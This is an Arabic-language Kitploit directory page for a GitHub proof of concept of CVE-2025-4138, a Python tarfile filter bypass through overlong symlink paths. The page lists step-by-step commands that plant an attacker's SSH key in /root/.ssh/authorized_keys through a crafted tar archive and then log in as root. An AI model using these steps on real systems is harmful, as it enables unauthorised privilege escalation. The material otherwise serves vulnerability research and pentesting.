Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4138 — ثغرة اجتياز الدليل في وحدة Tarfile (مع تجاوز سعة عبر الدليل) --> تؤدي إلى تصعيد الامتيازات | Kitploit
أدوات/GitHubGitHub/localh0ste/cve-2025-4138
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHublocalh0ste/cve-2025-4138

CVE-2025-4138

ثغرة اجتياز الدليل في وحدة Tarfile (مع تجاوز سعة عبر الدليل) --> تؤدي إلى تصعيد الامتيازات

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-4138 (ثغرة اجتياز الدليل في وحدة Tarfile في بايثون مع تجاوز الدليل المتقاطع)

التأثير : تصعيد الصلاحيات


العمل :

تدعم طريقتا TarFile.extractall() و TarFile.extract() في بايثون ميزة تسمح بتعيين فلتر لتحسين أمان استخدام هذه الطرق. توفر المكتبة القياسية لبايثون تطبيقين tar_filter ("tar") و data_filter ("data")، لكل منهما فحوصات مختلفة لتحسين أمان استخراج ملفات tar.

يوجد خطأ عند معالجة مسار يحتوي على روابط رمزية أقصر من PATH_MAX، ولكنه أطول من PATH_MAX عند استبدال الروابط الرمزية بواسطة os.path.realpath(). أي روابط رمزية تتجاوز PATH_MAX لا يتم توسيعها.

يتم استخدام os.path.realpath() بواسطة فلتر "tar" و "data" للتحقق من المسار، ولكن لا يتم طرح أي خطأ إذا تم تجاوز PATH_MAX. لاحقًا أثناء extractall() أو extract() يتم استخدام المسارات دون تمريرها عبر os.path.realpath().

المرجع : https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f


كيفية استخدام الإثبات (PoC) :

  1. سنقوم بلصق مفتاح ssh العام الخاص بنا في /root/.ssh/authorized_keys لتصعيد الصلاحيات.
  2. اتبع الأوامر أدناه للاستغلال
root@kitploit:~
ssh-keygen -t ed25519 -f any
mkdir test

mv any.pub authorized_keys
cp authorized_keys /test
cd test

# ضع اسم ملف مفتاحك العام (authorized_keys)
python3 exploit.py
(file.tar) ~ تم إنشاؤه

# الآن باستخدام Python3
sudo python3 tar -xvf file.tar

# تسجيل الدخول
chmod 600 any
ssh -i any user@ip

تنزيل الأداة